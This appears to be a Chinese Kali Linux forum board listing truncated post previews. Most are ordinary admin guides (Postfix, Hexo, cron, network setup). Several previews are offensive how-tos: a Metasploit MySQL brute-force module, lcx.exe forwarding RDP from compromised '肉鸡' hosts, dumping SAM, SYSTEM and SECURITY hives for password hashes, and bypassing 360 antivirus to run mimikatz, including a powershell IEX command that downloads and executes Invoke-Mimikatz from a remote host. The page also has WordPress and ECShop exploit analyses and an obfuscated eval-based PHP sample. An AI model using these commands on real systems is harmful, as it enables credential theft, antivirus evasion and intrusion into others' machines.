Linux Kali高级学习教程
介绍Linux KALI的使用方法和各种系统工具的下载方法。
404个主题在此版块
-
- 0 篇回复
- 181 次查看
msfconsole篇启动msfconsole msf > use auxiliary/scanner/mysql/mysql_login msf auxiliary(mysql_login) > show options Module options (auxiliary/scanner/mysql/mysql_login): Name Current Setting Required Description ---- --------------- -------- ----------- BLANK_PASSWORDS false no Try blank passwords for all users BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 DB_ALL_CREDS false no Try each user/password couple stored in the current database DB_ALL_PASS …
Ken1Ve的最后回复, -
- 0 篇回复
- 119 次查看
介绍我有一台Ubuntu服务器,上面运行了若干应用。我希望某个应用崩溃或出问题的时候,系统后台自动把故障信息发到我的邮箱。这样,免去了我远程登录服务器,查看运行故障日志的烦恼。此处仅需要服务器能发送邮件即可,不需收取邮件。 Postfix是Linux平台上应用广泛的邮件系统。本文中将在Ubuntu平台上安装配置Postfix,实现发送邮件功能。 步骤一:安装Postfix首先更新软件包: sudo apt-get update然后安装Mailutils(Postfix在该包中): sudo apt-get install mailutils安装中首先会出现问题请你确认,选择Y Do you want to continue?[Y/n] 在确认配置页面,tab至ok,回车: 以下配置页面共5个选项,我们选择默认选项Internet Site: 下面的配置页面是输入系统邮件名字,保持默认: 步骤二:配置PostfixPostfix需要在配置中监听loopbackinterface,打开主Postfix配置文件: sudo vi /etc/postfix/main.cf将inet_interfaces = all更为inet_interfaces = loopback-only,保存退出。 重启Postfix: sudo service postfix restart步骤三:测试发送邮件echo "测试邮件正文" | mail -s "邮件标题" your_email_address 用你的邮箱地址代替your_email_addres…
Ken1Ve的最后回复, -
- 0 篇回复
- 156 次查看
最近使用Hexo搭建了一个自己的博客,在搭建的过程中遇到了很多的坑,现在博客搭建完成了,非常感谢Hexo以及pure这么好的项目。我将自己在搭建的过程中遇到的问题进行了一个记录,以便后来的使用者够快速的上手。文章如有不足之处或者有相关的问题所在,欢迎大家评论留言,或者联系作者微信:wwb765912435,备注来自博客问题,谢谢! 安装Hexo环境More info:Hexo安装node.js和npm环境curl -sL https://deb.nodesource.com/setup_10.x | sudo -E - sudo apt-get install -y nodejs这里提供的是快速安装node.js 10的方法,安装node同时会安装npm,其它node.js版本的安装方法请自行查阅。 安装Hexonpm install -g hexo-cli初始化博客网站hexo init <folder> cd <folder> npm install添加pure主题More info:hexo-theme-puregit克隆样式文件至博客theme目录下 无需手动创建目录,直接在博客目录下执行该git命令即可 git clone https://github.com/cofess/hexo-theme-pure.git themes/pure克隆样式到博客的theme目录下后,将会有两个__config.yml文件,一个在博客站点目录下。一个在theme/pure目录下。这两个__config.yml文件名…
Ken1Ve的最后回复, -
- 0 篇回复
- 141 次查看
效果 java代码import java.awt.BorderLayout; import java.awt.Component; import java.awt.EventQueue; import javax.swing.JFrame; import javax.swing.JPanel; import javax.swing.border.EmptyBorder; import javax.swing.JLabel; import javax.swing.JOptionPane; import java.awt.Font; import javax.swing.JButton; import java.awt.event.ActionListener; import java.awt.event.ActionEvent; import java.awt.Color; import javax.swing.JTabbedPane; import javax.swing.ImageIcon; public class love extends JFrame { /** * */ private static final long serialVersionUID = 5430219520645185275L; private JPanel contentPane; protected Component frame; /** * Launch the ap…
Ken1Ve的最后回复, -
- 0 篇回复
- 140 次查看
简介FinalShell是一体化的的服务器,网络管理软件,不仅是ssh客户端,还是功能强大的开发,运维工具,充分满足开发,运维需求。并且有很多特色功能,如:免费海外服务器远程桌面加速,ssh加速、双边tcp加速、内网穿透等。 截图 主要特性多平台支持Windows,Mac OS X,Linux。 多标签,批量服务器管理。 支持登录Ssh和Windows远程桌面。 漂亮的平滑字体显示,内置100多个配色方案。 终端,sftp同屏显示,同步切换目录。 命令自动提示,智能匹配,输入更快捷,方便。 sftp支持,通过各种优化技术,加载更快,切换,打开目录无需等待。 服务器网络,性能实时监控,无需安装服务器插件。 内置海外服务器加速,加速远程桌面和ssh连接,操作流畅无卡顿。 双边加速功能,大幅度提高访问服务器速度。 内存,Cpu性能监控,Ping延迟丢包,Trace路由监控(需要高级版支持)。 实时硬盘监控。 进程管理器。 快捷命令面板,可同时显示数十个命令。 内置文本编辑器,支持语法高亮,代码折叠,搜索,替换。 ssh和远程桌面均支持代理服务器。 打包传输,自动压缩解压。 免费内网穿透,无需设置路由器,无需公网ip。 支持rz、sz(zmodem)。 更多功能会逐步增加,保持最少每周一次更新的频率,敬请关注。 下载使用Windows版下载地址:http://www.hostbuf.com/downloads/finalshell_install.exe Mac版、Linux版安装及教程:http://www.hostbuf.com/t/1059…
Ken1Ve的最后回复, -
- 0 篇回复
- 125 次查看
说明方法有哪些是一个百度网盘搜索工具,我们可以搜索很多网盘里的资源,就算是加密文件,有的也会自动获取密码,但不是全部都能获取到,总体来说还是很强大的。 截图 使用方法下载后打开,输入搜索内容后,搜索,双击列表将会自动打开该网盘链接,若有密码将自动复制密码,再将密码粘贴进去。 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/345.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
Ken1Ve的最后回复, -
- 0 篇回复
- 133 次查看
说明:一般我们在编辑文件的时候,都喜欢用WinSCP等FTP软件进行编辑,这样确实方便不少,也有时候为了方便直接用vim编辑文件。不过有时候编辑带有中文文件的时候会出现乱码的情况,这样有点影响我们的操作,这里就说下解决方法。 方法1、编辑.vimrc文件 vim .vimrc加入以下代码: set fileencodings=utf-8,ucs-bom,gb18030,gbk,gb2312,cp936 set termencoding=utf-8 set encoding=utf-8保存并退出,当然也可以用WinSCP等FTP软件在root文件夹新建并编辑.vimrc文件。 2、执行生效 source .vimrc最后我们再使用vim编辑中文文件的时候就不会出现乱码情况了。 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/346.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
Ken1Ve的最后回复, -
- 0 篇回复
- 119 次查看
说明:很多时候我们的VPS运行脚本或者重启某些软件的时候都需要用到定时功能,这时候就要用到Crontab定时软件了,这里简单的说下安装和使用方法。 安装一般我们使用的Centos或者Debian都自带Crontab定时软件,如果没有,那我们就需要安装了。 1、centos安装crontab yum install vixie-cron crontabs #安装Crontab chkconfig crond on #设置开机启动Crontab service crond start #启动Crontab2、debian安装crontab apt-get install cron #安装Crontab /etc/init.d/cron restart #重启Crontab使用1、基本命令 crontab -e #编辑定时任务 crontab -r #移除定时任务 crontab -l #查看定时任务2、使用命令 添加的命令必须以如下格式: /root/rats.sh #前5个*指时间,后面为命令前5个*分别表示:分钟:0-59 小时:1-23 日期:1-31 月份:1-12 星期:0-6(0表示周日) 还可以用一些特殊符号: *: 表示任何时刻 ,: 表示分割 -:表示一个段,如:1-5,就表示1到5点 /n : 表示每个n的单位执行一次,如:*/1, 就表示每隔1个小时执行一次命令。也可以写成1-23/1 3、定时任务设置举例 21 * #21:43 执行05 * #05:15 执行17 …
Ken1Ve的最后回复, -
- 0 篇回复
- 121 次查看
临时修改IP ifconfig eno16777736 192.168.1.101 注意(eno16777736)是默认第一个网络接口名称 永久修改IP第一步:查看网络接口 ifconfig 第二步:去对应的网络接口配置文件修改配置,注意文件名称是(ifcfg-默认第一个网络接口名称),文件路径是/etc/sysconfig/network-scripts/ vim /etc/sysconfig/network-scripts/ifcfg-网络接口名称 修改以下配置 TYPE=Ethernet BOOTPROTO=static DEFROUTE=yes IPV4_FAILURE_FATAL=no IPV6INIT=yes IPV6_AUTOCONF=yes IPV6_DEFROUTE=yes IPV6_FAILURE_FATAL=no NAME=eno16777736 UUID=9e8d604f-d991-4aa2-88a3-4c679e6f139c DEVICE=eno16777736 ONBOOT=yes PEERDNS=yes PEERROUTES=yes IPV6_PEERDNS=yes IPV6_PEERROUTES=yes HWADDR=00:0c:29:ce:3f:3c #MAC地址 IPADDR=192.168.1.104 #静态IP GATEWAY=192.168.1.2 #默认网关 NETMASK=255.255.255.0 #子网掩码 DNS1=192.…
Ken1Ve的最后回复, -
- 0 篇回复
- 130 次查看
Submitted by dravenk on Wed, 08/08/2018 - 16:06 所需条件: 一台具有公网地址的服务器一台局域网内的电脑在内网的电脑上执行: ssh -qTfNn -R '[::]:8787:localhost:8887' User@RemoteHost解释:访问远程服务器(RemoteHost)的 8787 端口,会将访问转发到内网电脑的 8887 端口。 还需要 vim /etc/ssh/sshd_config加上 GatewayPorts yes 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/351.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
Ken1Ve的最后回复, -
- 0 篇回复
- 117 次查看
下面就先详细讲解下LXC转发工具与使用方法: lcx.exe是个端口转发工具,相当于把肉鸡A上的3389端口转发到B机上, 当然这个B机必须有外网IP.这样链接B机的3389度端口就相当于链接A机的3389. 用法: 如在本机B上监听 -listen 51 3389,在肉鸡A上运行-slave 本机ip 51 肉鸡ip 3389 那么在本地连127.0.0.1就可以连肉鸡的3389.第二条是本机转向。 例:现在有一个ip为222.221.221.22的websehll.用端口扫描发现开放了3389端口 可是我们输入外网IP可是不能正常链接。那么很有可能就是内网服务器。我们dos执行ipconfig可以看到。 这样的就是内网服务器了。 上传lcx.exe到肉鸡 然后 cx.exe -listen 51 3389 意思是监听51端口并转发到3389端口。 显示如下[+] Listening port 51 …… [+] Listen OK! [+] Listening port 3389 …… [+] Listen OK! [+] Waiting for Client on port:51 …… 然后在肉鸡上运行 lcx.exe -slave 你的IP 51 222.221.221.22 3389 222.221.221.22是我举例用的肉鸡IP.换成你的..运行以后本机监听端口。 显示如下信息 [+] Listening port 51 …… [+] Listen OK! [+] Listening port 3389 ……
Ken1Ve的最后回复, -
- 0 篇回复
- 175 次查看
通过远程url调用shell 命令是很爽的事情,可以解决很多问题. 况且本文介绍的方法是非阻塞的, 也就是说可以很多并发调用,无论你的命令执行时间多久, 并不会导致web服务阻塞异常. 首先自行安装openresty,不做介绍了就. 假如我们安装路径为:/southtv/openresty 1 首先安装sockprocgit clone https://github.com/juce/sockproc cd sockproc make ./sockproc /tmp/shell.sock chmod 0666 /tmp/shell.socksockproc 是一个服务器程序, 侦测unix socket 或者 tcp socket , 并把收到的命令,传递给子进程执行,执行完毕后,把结果返回给客户端, 我们就让sockproc 侦测/tmp/shell.sock 的套接口有没有数据到来. 2 安装lua-resty-shell模块.它是一个很小的库, 配合openresty 使用, 目的是提供类似于os.execute 或io.popen的功能, 唯一区别它是非阻塞的, 也就是说即使需要耗时很久的命令,你也可以使用它 git clone https://github.com/juce/lua-resty-shell cd lua-resty-shell cp lib/resty/shell.lua /southtv/openresty/lualib/resty/ 这是你的项目路径3 创建自己的命令调用lua 脚本vim /southt…
Ken1Ve的最后回复, -
- 0 篇回复
- 153 次查看
漏洞分析在文件 WordPress/wp-admin/load-scripts.php 中: <?php ...//ignore $load = $_GET['load']; if ( is_array( $load ) ) { $load = implode( '', $load ); } $load = preg_replace( '/[^a-z0-9,_-]+/i', '', $load ); $load = array_unique( explode( ',', $load ) ); ...//ignore foreach ( $load as $handle ) { if ( ! array_key_exists( $handle, $wp_scripts->registered ) ) { continue; } $path = ABSPATH . $wp_scripts->registered[ $handle ]->src; $out .= get_file( $path ) . "\n"; } ...//ignore echo $out; exit;load-scripts.php 文件会根据load参数传入的文件名依次载入文件并输出。同时程序对load参数的内容进行了过滤,只有在白名单$wp_scripts中的JS文件才会被载入。 该JS文件白名单的内容在文件 WordPress/wp-includes/script-loader.php …
Ken1Ve的最后回复, -
- 0 篇回复
- 148 次查看
漏洞分析1.文件wp-includes/post.php中: function wp_delete_attachment( $post_id, $force_delete = false ) { $meta = wp_get_attachment_metadata( $post_id ); if ( ! empty($meta['thumb']) ) { // Don't delete the thumb if another attachment uses it. if (! $wpdb->get_row( $wpdb->prepare( "SELECT meta_id FROM $wpdb->postmeta WHERE meta_key = '_wp_attachment_metadata' AND meta_value LIKE %s AND post_id <> %d", '%' . $wpdb->esc_like( $meta['thumb'] ) . '%', $post_id)) ) { $thumbfile = str_replace(basename($file), $meta['thumb'], $file); /** This filter is documented in wp-includes/functions.php */ $thum…
Ken1Ve的最后回复, -
- 0 篇回复
- 109 次查看
该漏洞产生的根本原因在于ECShop系统的user.php文件中,display函数的模板变量可控,导致注入,配合注入可达到远程代码执行的效果。使得攻击者无需登录等操作,直接可以获得服务器的权限。 首先从user.php文件入手,代码中可以看到,系统读取HTTP_REFERER传递过来的内容赋值给$back_act变量。接着以$back_act的值为参数,调用assign方法。 /* 用户登录界面 */ elseif ($action == 'login') { if (empty($back_act)) { if (empty($back_act) && isset($GLOBALS['_SERVER']['HTTP_REFERER'])) { $back_act = strpos($GLOBALS['_SERVER']['HTTP_REFERER'], 'user.php') ? './index.php' : $GLOBALS['_SERVER']['HTTP_REFERER']; } else { $back_act = 'user.php'; } } $captcha = intval($_CFG['captcha']); if (($captcha & CAPTCHA_LOGIN) && (!($cap…
Ken1Ve的最后回复, -
- 0 篇回复
- 119 次查看
ZIPzip可能是目前使用得最多的文档压缩格式。它最大的优点就是在不同的操作系统平台,比如Linux, Windows以及Mac OS,上使用。缺点就是支持的压缩率不是很高,而tar.gz和tar.gz2在压缩率方面做得非常好。 可以使用下列的命令压缩一个目录: zip -r archive_name.zip directory_to_compress下面是如果解压一个zip文档: unzip archive_name.zipTARTar是在Linux中使用得非常广泛的文档打包格式。它的好处就是它只消耗非常少的CPU以及时间去打包文件,他仅仅只是一个打包工具,并不负责压缩。 下面是如何打包一个目录: tar -cvf archive_name.tar directory_to_compress如何解包: tar -xvf archive_name.tar.gz上面这个解包命令将会将文档解开在当前目录下面。当然,你也可以用这个命令来捏住解包的路径: tar -xvf archive_name.tar -C /tmp/extract_here/TAR.GZ它在压缩时不会占用太多CPU的,而且可以得到一个非常理想的压缩率。 使用下面这种格式去压缩一个目录: tar -zcvf archive_name.tar.gz directory_to_compress解压缩: tar -zxvf archive_name.tar.gz上面这个解包命令将会将文档解开在当前目录下面。 当然,你也可以用这个命令来捏住解包的路径: tar -zxvf ar…
Ken1Ve的最后回复, -
- 0 篇回复
- 129 次查看
社会工程学是黑客米特尼克在《欺骗的艺术》中率先提出的,其初始目的是为了让全球的网民们能够懂得网络安全,提高警惕,防止不必要的个人损失。 http://img.mp.itc.cn/q_70,c_zoom,w_640/upload/20170729/0f63f6d5dffe43b3a710a5e84f81bfe7_th.jpg 从广义上来说,社会工程学是一种通过对“人性”的心理弱点、本能反应、好奇心、信任、贪婪等心理陷阱进行诸如欺骗、伤害等危害手段取得自身利益的手法,它并不能等同于一般的欺骗手法,社会工程学尤其复杂,即使自认为最警惕最小心的人,一样会被高明的社会工程学手段损害利益。 其实,现在的黑客攻击也不止是仅仅通过网络来进行远程的渗透与入侵,还会通过社会工程学在线下场景中来针对人性弱点进行相应的攻击。而且不幸的是,这种手段对于黑客来说非常有效,成功率也非常之高。 下面小编就来为大家介绍一下八种强大的社会工程学攻击手段! 一、混脸儿熟这是社会工程学中最常见的攻击方法之一。首先,黑客会通过各种手段混入目标公司内部,并与公司中的一些员工混个面儿熟,然后逐渐被其他的同事认可,并最终赢得信赖。或者假装成公司职员混入办公室,这样他就可以在公司中获得更多的权限以便于实施攻击计划了。当然除了黑客以外,通常警察在做卧底的时候也会使用这招。 建 议在公司中遇到陌生人向你打招呼让你带他进门或者声称与某位同事非常熟悉时,可以让这位“童鞋”在指定的区域等待,让相应的人或同事来接待他。 http://img.mp.itc.cn/q_70,c_zoom,w_640/u…
Ken1Ve的最后回复, -
- 0 篇回复
- 154 次查看
现在登录目标3389后,我看好多人都已经习惯抓密码HASH然后回来彩虹表破解出明文了,或者传个winloginhack来记录3389的登录密码。在我最近的几次渗透中,发现pwdump,fgdump这类工具现在已经不免杀了,而且这类工具都是要注入到lsass.exe进程的,遇到macfee这类的杀毒软件,默认是绕不过去的。Winlogin网上放出来的,经过我的测试,对WIN2008是没有效果的。今天浏览BLOG,看到老外提到另一种抓系统密码hash的技巧,经过实践,发现可行,分享给大家。首先使用administrator权限登录,然后使用reg来保存注册表中HKLM下的SECURITY,SAM,SYSTEM,注意这里必须使用reg的save选项,export选项是不行的 reg save hklm\sam sam.hive reg save hklm\system system.hive reg save hklm\security security.hive 然后把sam.hive,system.hive,security.hive下载回本地,打开CAIN,在”Decoders”标签下,点”LSASecrets”,点”+”来导入system.hive和security.hive. 如图二: 这里一般就能看到管理员的明文密码了,如图3,当然这里的密码,有时候也是历史密码。如果尝试登录不对,可以来尝试爆破lm/ntlmhash. 要破解LM/NTLMhash,首先点”cracker”标签下的”LM&NTLMhashes”然后点”…
Ken1Ve的最后回复, -
在有时候我们利用PHP编写部分代码的时候,会碰到部分php代码加密的情况,那么我们该如何解密php代码呢?示例代码<?php // $OOO0O0O00=__FILE__;$OOO000000=urldecode('%74%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64%66%70%6e%72');$OO00O0000=16;$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5};$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};$OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5};$O0O0000O0='OOO0000O0';eval(($$O0O0000O0('JE9PME9PMDAwMD0kT09PMDAwMDAwezE3fS4kT09PMDAwMDAwezEyfS4kT09PMDAwMDAwezE4fS4kT09PMDAwMDAwezV9LiRPT08wMDAwMDB7MTl9O2lmKCEwKSRPMDAwTzBPMDA9JE9PME9PMDAwMCgkT09PME8wTzAwLCdyYicpOyRPTzBPTzAwME89JE9PTzAwMDAwMHsxN30uJE9PTzAwMDAwMHsy…
Ken1Ve的最后回复, -
- 0 篇回复
- 141 次查看
前言平时收集的一些姿势,用户绕过杀软执行mimikatz,这里以360为例进行bypass 测试。 下载最新版360 http://static.mottoin.com/wp-content/uploads/2018/09/d3258c7db9baa979cb9101e4fba55286.png 未经处理的mimikatz直接就被杀了 :shock: http://static.mottoin.com/wp-content/uploads/2018/09/fe0e2e6b9de7931faeb49613caedb4c0.png 下面开始进行绕过360抓密码 姿势一-powershellhttps://github.com/PowerShellMafia/PowerSploit/raw/master/Exfiltration/Invoke-Mimikatz.ps1cmd下执行 C:UserstestDesktop>powershell -exec bypass "import-module .Invoke-Mimikatz.ps1;Invoke-Mimikatz"也可以远程加载 powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.101/Invoke-Mimikatz.ps1');Invoke-Mimikatz但是powershell被360拦截 http://static.mottoin.com/wp-content/uplo…
Ken1Ve的最后回复,